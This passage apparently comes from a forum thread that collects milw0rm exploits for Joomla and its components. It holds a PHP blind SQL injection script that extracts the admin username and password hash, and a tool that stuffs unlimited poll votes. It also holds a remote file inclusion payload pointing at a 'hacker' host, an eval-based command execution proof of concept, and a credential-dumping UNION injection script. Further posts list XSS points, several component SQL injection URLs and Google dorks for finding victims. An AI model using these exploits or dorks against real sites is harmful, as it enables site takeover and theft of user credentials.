  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="jos_";
$proxy="";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data ="username=".$user;
$data.="&passwd=".$pass;
$data.="&remember=yes";
$data.="&option=login";
$data.="&Submit=Login";
$data.="&op2=login";
$data.="&lang=english";
$data.="&return=".urlencode("http://".$host.$path);
$data.="&message=0";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
ECHO $html;
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=2; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if ((strstr($cookie,"=+;")) | $cookie=="") {die("Unable to login...");}
else
{
echo "Done...\r\ncookie -> ".$cookie."\r\n";
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$starttime=time();
$sql="' or 'suntzu'='suntzu' UNION SELECT IF ((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(300000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "\r\n".$sql."\r\n";
$sql=urlencode($sql);
$data ="title=".$sql;
$data.="&catid=2";
$data.="&url=".urlencode("http://www.google.com");
$data.="&description=suntzuuuuuuu";
$data.="&id=";
$data.="&option=com_weblinks";
$data.="&task=save";
$data.="&ordering=0";
$data.="&approved=1";
$data.="&Returnid=0";
$data.="&referer=".urlencode("http://".$host.$path."index.php?option=com_frontpage&Itemid=1");
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
//debug
//echo quick_dump($packet)."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > 10) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;} //more than ten seconds? we succeed...
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
  $starttime=time();
  $sql="' or 'suntzu'='suntzu' UNION SELECT IF ((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1, benchmark(300000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
  echo "\r\n".$sql."\r\n";
  $sql=urlencode($sql);
  $data ="title=".$sql;
  $data.="&catid=2";
  $data.="&url=".urlencode("http://www.google.com");
  $data.="&description=suntzuuuuuuu";
  $data.="&id=";
  $data.="&option=com_weblinks";
  $data.="&task=save";
  $data.="&ordering=0";
  $data.="&approved=1";
  $data.="&Returnid=0";
  $data.="&referer=".urlencode("http://".$host.$path."index.php");
  $packet ="POST ".$p."index.php HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Accept: text/plain\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Cookie: ".$cookie."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n\r\n";
  $packet.=$data;
  //debug
  //echo quick_dump($packet)."\r\n";
  sendpacketii($packet);
  $endtime=time();
  echo "endtime -> ".$endtime."\r\n";
  $difftime=$endtime - $starttime;
  echo "difftime -> ".$difftime."\r\n";
  if ($difftime > 10) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
  if ($i==255) {die("Exploit failed...");}
  }
  $j++;
}
//if you are here...
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
?>

# milw0rm.com [2006-06-17]

Joomla add unlimited votes

PHP код:

<?php
#          Joomla [poll component] add unlimited votes            #
#            Computer Security Researchers Institute              #
#              works regardless of php.ini settings               #
#                          by trueend5                            #
#                     [http://www.KAPDA.ir]                       #


error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo '<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Joomla [poll component] arbitrary add votes</title>
</head>
<body bgcolor="#FFCCFF">
<p align="center"><font size="4" color="#0000FF">Joomla&nbsp; [poll
component] arbitrary add votes</font></p>
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
<p align="center"><font size="4" color="#008000">Computer Security Researchers
Institute</font></p>
<font SIZE="3">
<p align="center"><b><a href="http://www.kapda.ir"><font color="#000000">KAPDA</font></a>.ir</b></p>

<p align="center">&nbsp;</p>
</font>
<table width="90%">
  <tbody>
    <tr>
      <td width="43%" align="left">
        <form name="form1" action="'.$SERVER[PHP_SELF].'" method="post">
          <p><input name="host" size="20"> <span class="Stile5"><font color="#FF0000">*</font> hostname (ex: www.sitename.com)</span></p>

          <p><input name="path" size="20"> <span class="Stile5"><font color="#FF0000">*</font> path (ex: /joomla/
          or just / )</span></p>
          <p><input name="pollid" size="20"> <span class="Stile5"><font color="#FF0000">
            *</font> pollid (ex: index.php?option=com_poll&amp;task=results&amp;<b><font size="4">id=14</font></b> )</span></p>

          <p><input name="voteid" size="20"><span class="Stile5"><font color="#FF0000">
            *</font> voteid ( <b><u>1</u></b> for first option, <b><u>2</u></b>
            for second one , <b><u>3</u></b> for third and so... )</span></p>

            <p><input name="hits" size="20"><span class="Stile5"><font color="#FF0000">
            *</font>
            hits ( number of votes that you want to add ) </span></p>
          <p><input name="port" size="20"><span class="Stile5">&nbsp;&nbsp;&nbsp; specify a port&nbsp;
          (default: 80)</span></p>
          <p><input name="proxy" size="20" ><span class="Stile5">&nbsp;&nbsp;&nbsp; send exploit
          through an HTTP proxy (ip:port)</span></p>

          <p align="center"> <span class="Stile5"><font color="#FF0000">&nbsp;&nbsp;
          * </font>fields are required</span></p>
          <p align="center"><span class="Stile5">-----------------------------------------------------------------------------------------------</span></p>

          <p><input type="submit" value="Start" name="Submit"></p>
        </form></td></tr></tbody></table></body></html>';


function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
                }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
                }
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() 

{
  global $proxy, $host, $port, $packet, $html, $proxy_regex;
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  if ($socket < 0) {
                   echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
                   }
          else
           {   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid proxy...';
                        die;
                       }
                    echo "OK.<br>";
                    echo "Attempting to connect to ".$host." on port ".$port."...<br>";
                    if ($proxy=='')
           {
             $result = socket_connect($socket, $host, $port);
           }
           else
           {

           $parts =explode(':',$proxy);
                   echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
           $result = socket_connect($socket, $parts[0],$parts[1]);
           }
           if ($result < 0) {
                                     echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
                                    }
                           else
                            {
                                     echo "OK.<br><br>";
                                     $html= '';
                                     socket_write($socket, $packet, strlen($packet));
                                     echo "Reading response:<br>";
                                     while ($out= socket_read($socket, 2048)) {$html.=$out;}
                                     echo nl2br(htmlentities($html));
                                     echo "Closing socket...";
                                     socket_close($socket);

                    }
                  }
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
           {$ock=fsockopen(gethostbyname($host),$port);}
             else
           {
       $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid proxy...';
                        die;
                       }
       $parts=explode(':',$proxy);
        echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) { echo 'No response from proxy...';
            die;
               }
       }
fputs($ock,$packet);
if ($proxy=='')
  {

    $html='';
    while (!feof($ock))
      {
        $html.=fgets($ock);
      }
  }
else
  {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      $html.=fread($ock,1);
    }
  }
fclose($ock);
//echo nl2br(htmlentities($html));
}

  $host=trim($_POST[host]);
  $path=trim($_POST[path]);
  $port=intval(trim($_POST[port]));
  $pollid=intval(trim($_POST[pollid]));
  $voteid=intval(trim($_POST[voteid]));
  $hits=intval(trim($_POST[hits]));
if (($host<>'') and ($path<>'') and ($pollid<>'') and ($voteid<>'') and ($hits<>''))
{
  $host=str_replace("\r\n","",$host);
  $path=str_replace("\r\n","",$path);
  if ($port=='') {$port=80;}
  if ($hits=='') {$hits=200;}
  if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
  if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  $livesite=$host;
  if ($path=='/') {$livepath='';} else $livepath=substr("$path", 0, strlen($path)-1);
  $sessionpath='http://'.$livesite.$livepath;

  $packet="HEAD ".$p."index.php HTTP/1.1\r\n";
  $packet.="User-Agent: Shareaza v1.x.x.xx\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  show($packet);
  sendpacketii($packet);
  echo nl2br(htmlentities($html));

  //trying to obtain cookiename from HEADER
  $pattern="([a-z0-9]{32}=)";
  if(preg_match($pattern, $html, $matches)) {$match=$matches[0];
  $sessionCookieName=substr("$match", 0, strlen($match)-1);
  } else
  //trying to generate cookiename
  {$sessionCookieName= md5( 'site'.$sessionpath );}

  for ($t = 14; $t < $pollid; $t++) {$voteid=$voteid + 12;}
  $data="voteid=".$voteid."";
  $packet="POST ".$p."index.php?option=com_poll&task=vote&id=".$pollid."&".$sessionCookieName."=1 HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  $packet.=$data;
  show($packet);
  sendpacketii($packet);
  echo nl2br(htmlentities($html));

  if (!eregi("Location",$html)) {
  echo "\n\nExploit failed..."; die();
 }
                           else {
  for ($n = 2; $n <= $hits; $n++) {
  
  $data="voteid=".$voteid."";
  $packet="POST ".$p."index.php?option=com_poll&task=vote&id=".$pollid."&".$sessionCookieName."=1 HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  $packet.=$data;
  sendpacketii($packet);

  if (!eregi("Location",$html)) {
  echo "\n\nExploit failed..."; die();
   }
  echo "<br />".$n.":added.";
 }
                            echo "<br /> Exploit succeeded <br />";
                            echo'<p align="center"><a href="'.$sessionpath.'/index.php?option=com_poll&task=results&id='.$pollid.'"><font color="#0000FF">Results</font></a></p>';
                            }
}
else
{echo 'Fill in requested fields, optionally specify a proxy';}
?>

# milw0rm.com [2006-08-19]

Joomla! 1.5.0 Remote file include

PHP код:

Hi,
Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
or `production` sites."
Joomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesnt
have a good security approach. Anyway, there is a remote file inclusion
in Joomla 1.5.0 Beta :

File /libraries/pcl/pcltar.php, Line 74 :
 if (!defined("PCLERROR_LIB"))
 {
       include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
 }

POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?

The original advisory (in Persian) is located at :
http://www.hackers.ir/advisories/joomla.html


- Omid

# milw0rm.com [2007-04-23] 


Remote command execution in Joomla! CMS 1.5 beta 2

PHP код:

SEC Consult Security Advisory < 20070722-0 >
=======================================================================
             title: Remote command execution in Joomla! CMS
           program: Joomla!
 vulnerable version: 1.5 beta 2
                    Earlier 1.5 versions may be vulnerable too!
            impact: critical
          homepage: http://www.joomla.org
             found: 2007-05-20
                by: Johannes Greil / SEC Consult / www.sec-consult.com
=======================================================================

Vendor description:
-------------------

Joomla! is an award-winning Content Management System (CMS) that will
help you build websites and other powerful online applications. Best of
all, Joomla! is an open source solution that is freely available to
everybody. Joomla! is used all over the world to power everything from
simple, personal homepages to complex corporate web applications.

[source: http://www.joomla.org/content/view/12/26/]



Vulnerability overview:
-----------------------

The search component of Joomla! allows an attacker to execute arbitrary
PHP commands. It is e.g. possible to execute OS commands via system()
calls. PHP is set to the settings recommended by the Joomla! installer!


An attacker does not need to be authenticated to perform this attack!


Vulnerability description:
--------------------------

The following scripts of a default Joomla! 1.5 beta 2 installation
contain the vulnerable code:

1) components/com_search/views/search/tmpl/default_results.php

line 12: <?php eval ('echo "'. $this->result .'";'); ?>

2) templates/beez/html/com_search/search/default_results.php

line 25: echo '<p>' . eval ('echo "' . $this->result . '";');


Input of the "searchword" parameter is being passed to the mentioned
eval() code and executed. An attacker is able to append new PHP commands
after the "echo" language construct which can be used for OS command
execution.

In order to bypass the search word length limitation of 20 characters a
new GET parameter is being used to specify the OS commands (see proof of
concept).


Proof of concept:
-----------------
http://$joomlahost/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
http://$joomlahost/index.php?c=id&searchword=";system($_GET[c]);%23&option=com_search&Itemid=1


Vulnerable versions:
--------------------

The following versions were found to be vulnerable:
* 1.5 beta 2

Earlier versions of Joomla! 1.5 beta have not been tested and may be
vulnerable too!

The stable version 1.0.13 of Joomla! does not contain the vulnerable
code and is not affected by this security issue.


Vendor contact timeline:
------------------------

2007-05-21: vendor notified via email (
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
вам необходимо ])
2007-05-21: vendor replied and fixed the issue in SVN
URL:
http://joomlacode.org/gf/project/joomla/scmsvn/?action=browse&path=%2Fdevelopment%2Ftrunk%2Fcomponents%2Fcom_search%2Fviews%2Fsearch%2Fview.php&r1=7455&r2=7456

2007-07-21: vendor released RC1 of Joomla! 1.5
2007-07-22: coordinated disclosure date, special greetings to Rob!


Solution:
---------
The vendor does not recommend using the development version v1.5 beta
for production sites and suggests using the latest stable version(s).

If Joomla! v1.5 beta is being used, upgrade to v1.5 RC1 immediately
which fixes the issue!


Patch/Workaround:
-----------------
Use the fix from SVN (check out at least revision 7456 of
/development/trunk/components/com_search/views/search/view.php)

# milw0rm.com [2007-07-22]

Joomla! 1.5 Beta1/Beta2/RC1 Remote SQL Injection Exploit

PHP код:

#!/usr/bin/php -q -d short_open_tag=on
<?php

/*

Explanation:

Although the comment points out that the "filter" variable is supposedly cleansed there is no 
input validation being performed except for the fact that all input is being turned into lowercase.

Affected Files:

components/com_content/models/archive.php
components/com_content/models/category.php
components/com_content/models/section.php

Code:

$filter = JRequest::getVar('filter', '', 'post');
if ($filter) {
    // clean filter variable
    $filter = JString::strtolower($filter);

    // Get the page/component configuration
    $params = &$mainframe->getPageParameters();
    switch ($params->get('filter_type', 'title'))
    {
        case 'title' :
        $where .= ' AND LOWER( a.title ) LIKE \'%'.$filter.'%\'';
        break;

        case 'author' :
        $where .= ' AND ( ( LOWER( u.name ) LIKE \'%'.$filter.'%\' ) OR ( LOWER( a.created_by_alias ) LIKE \'%'.$filter.'%\' ) )';
        break;

        case 'hits' :
        $where .= ' AND a.hits LIKE \'%'.$filter.'%\'';
        break;
      }
}
return $where;

Notes:

I found this in the first week of the 1.5 release, just wanted to see if nobody would realize
it was there and hopefully the same bug was about in FINAL, meh!

I must applaud the developers for their multi-factor authenication code they
added to the 1.5 version. For this reason I was unable to script a "login -> upload arbitrary 
script" exploit. Maybe someone better than me can do it...who knows!

magic_quotes_gpc must be set to off in order for this script to work!

Upload Arbitrary Files:

1. Login as admin via /administrator/
2. Browse to /administrator/index.php?option=com_installer
3. In the "Upload Package File" section choose ANY file you wish to upload
4. Browse to /tmp/[FILE] and it's there!

*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

if ($argc<3) {
print "-------------------------------------------------------------------------\r\n";
print "           Joomla! 1.5 Beta1/Beta2/RC1 SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: ./w4ck1ng_joomla.php [HOST] [PATH] ([PREFIX] [USER_ID])\r\n\r\n";
print "[HOST]           = Target server's hostname or ip address\r\n";
print "[PATH]           = Path where Joomla is located\r\n";
print "[PREFIX]    = Joomla table prefix\r\n";
print "[USER_ID]      = User ID to grab credentials for\r\n\r\n";
print "e.g. ./w4ck1ng_joomla.php victim.com /joomla/\r\n";
print "     ./w4ck1ng_joomla.php victim.com /joomla/ jos_ 62\r\n";
print "-------------------------------------------------------------------------\r\n";
print "                     http://www.w4ck1ng.com\r\n";
print "                            ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
die;
}

//Props to rgod for the following functions

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host = $argv[1];
$path = $argv[2];
$prefix = $argv[3];
$userid = $argv[4];
$port=80;$proxy="";

for ($i=5; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

function head(){

    print "-------------------------------------------------------------------------\r\n";
    print "              Joomla! 1.5 Beta1/Beta2 SQL Injection Exploit\r\n";
    print "-------------------------------------------------------------------------\r\n";

}

function footer(){

    print "-------------------------------------------------------------------------\r\n";
    print "                     http://www.w4ck1ng.com\r\n";
    print "                            ...Silentz\r\n";
    print "-------------------------------------------------------------------------\r\n";

}

    $sql = "%' UNION SELECT 0,password,0,0,0,0,0,password,0,username,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username FROM ";

    if(isset($prefix)){$sql .= $prefix;}
       else{$sql .= "jos_";}

    $sql .= "users WHERE id='";

    if(isset($userid)){$sql .= $userid;}
       else{$sql .= "62";}

    $sql .= "'/*";

    $data = "filter=$sql&month=&year=&limit=20&view=archive&option=com_content";

    $packet ="POST " . $path . "index.php?option=com_content&view=archive HTTP/1.1\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    $packet.="Content-Length: ".strlen($data)."\r\n";
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);

    $temp = explode("Author: ",$html);
    $temp2 = explode("<",$temp[1]);
    $username = $temp2[0];

    $temp = explode("Created: ",$html);
    $temp2 = explode("<",$temp[1]);
    $hash = $temp2[0];

    head();

    if($username && $hash){
     echo "[+] Admin User: " . $username . "\n";
     echo "[+] Admin Hash: " . $hash . "\n";
    }
    
    else{echo "[-] Exploit Failed...\n";}

    footer();
?>

# milw0rm.com [2007-09-01]

[b!atnoy]

Joomla 1.5.1

Active XSS

Edit Your Details -> Your Name: [XSS]

XSS
(Права администратора)
Active:
Article: [ New ] -> Title: [XSS]
Passive:
Filter:[XSS]

Код:

/administrator/index.php?option=com_menus&task=view&menutype=[XSS]

ZAMUT
antichat.ru

[b!atnoy]

Joomla Component Acajoom (com_acajoom) SQL Injection Vulnerability

Код:

###############################################
#
# Joomla Component com_acajoom SQL Injection
#
###############################################
#
# Author: fataku
#
# Mail    : 
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]
#
###############################################
#
# Dorks 1 : inurl:"com_acajoom" mailingid
#
###############################################
#
# Sploit:
#
# index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*
#
###############################################
#
# Note/Tip:
#
# jos_ prefix may need fixed
#
# it may differ the number id, try LIMIT/**/1,1/* instaed
#
###############################################
#
# Greetings:
#
# To all the guys at www.offensive-security.com
#
###############################################

side note:

	<name>Acajoom</name>
	<creationDate>January 2007</creationDate>
	<author>Joobi Ltd</author>
	<authorName>JoobiWeb</authorName>
	<copyright>© 2006-2007 Joobi Ltd. All Rights Reserved.</copyright>

	<license>http://www.acajoom.com/license.php</license>
	<authorEmail>
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]</authorEmail>
	<authorUrl>www.joobiweb.com</authorUrl>
	<version>1.1.5</version>
	<description>Acajoom is a mailing lists, newsletters, auto-responders, and follow up tool to communication effectively with your users and customers.
	Your Communication partner!</description>

# milw0rm.com [2008-03-18]

milw0rm.com

[b!atnoy]

Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability

Код:

##########################################
#
# Mambo Component com_joovideo SQL Injection(Powered by joovideo V1.0)
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : 
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]
#
###########################################
TODAY MY BİRTDAY
SOO I WROTE 5 BUGS ALL FOR HACKERS
5 EXPLOİTS HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE
DONT FORGET MY PRESENT HACKERS
GOOD LUCKY

100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi
YASGUNUM NEDENiYLE HEDiYE
iYi SANLAR

you can see all my exploits

http://my.opera.com/SQL-Injection/blog/

###########################################
#
# DORK 1 : allinurl: "com_joovideo" detail
#
# DORK 2 : allinurl: "com_joovideo"
#
# DORK 3 : Powered by joovideo V1.0
#
###########################################
EXPLOIT :

index.php?option=com_joovideo&Itemid=S@BUN&task=detail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*

###########################################
##################S@BUN####################
###########################################
#####
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]#####
###########################################

side note:
  <name>joovideo</name>
  <creationDate>18.04.2007</creationDate>
  <author>joomlapixel</author>
   <copyright>This component in released under the commercial License</copyright>
   <authorEmail>
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]</authorEmail>

  <authorUrl>www.joomlapixel.eu</authorUrl>
  <version>1.2.2</version>
  <description>joovideo! video manager semplificato per joomla!, versione commerciale</description>

# milw0rm.com [2008-03-19]

Joomla Component Alberghi <= 2.1.3 (id) SQL Injection Vulnerability

Код:

##########################################
#
# Mambo Component com_alberghi SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : 
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]
#
###########################################
TODAY MY BİRTDAY
SOO I WROTE 5 BUGS ALL FOR HACKERS
5 EXPLOİTS HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE
DONT FORGET MY PRESENT HACKERS
GOOD LUCKY

100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi
YASGUNUM NEDENiYLE HEDiYE
iYi SANLAR

you can see all my exploits

http://my.opera.com/SQL-Injection/blog/

###########################################
#
# DORK 1 : allinurl: "com_alberghi" detail
#
# DORK 2 : allinurl: "com_alberghi"
#
###########################################
EXPLOIT 1 :

index.php?option=com_alberghi&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOIT 2 :

index.php?option=com_alberghi&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*

###########################################
##################S@BUN####################
###########################################
#####
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]#####
###########################################

side note:
	<name>Alberghi</name>
	<author>Vamba</author>
	<creationDate>14-04-2007</creationDate>
	<copyright>This component is released under the GNU/GPL License</copyright>
	<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

	<authorEmail>
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]</authorEmail>
	<authorUrl>www.joomlaitalia.com</authorUrl>
	<version>2.1.3</version>
	<description>Alberghi a fork of Accombo project original Author Niall McCullagh</description>

# milw0rm.com [2008-03-19]

milw0rm.com

[b!atnoy]

Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability

Код:

##########################################
#
# Mambo Component com_restaurante SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : 
[На нашем форуме достаточно много полезной информации, поэтому для того чтобы видеть ссылки,
 вам необходимо ]
#
############################################
TODAY MY BİRTDAY
SOO I WROTE 5 BUGS ALL FOR HACKERS
5 EXPLOİT HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE
DONT FORGET MY PRESENT HACKERS
GOOD LUCKY

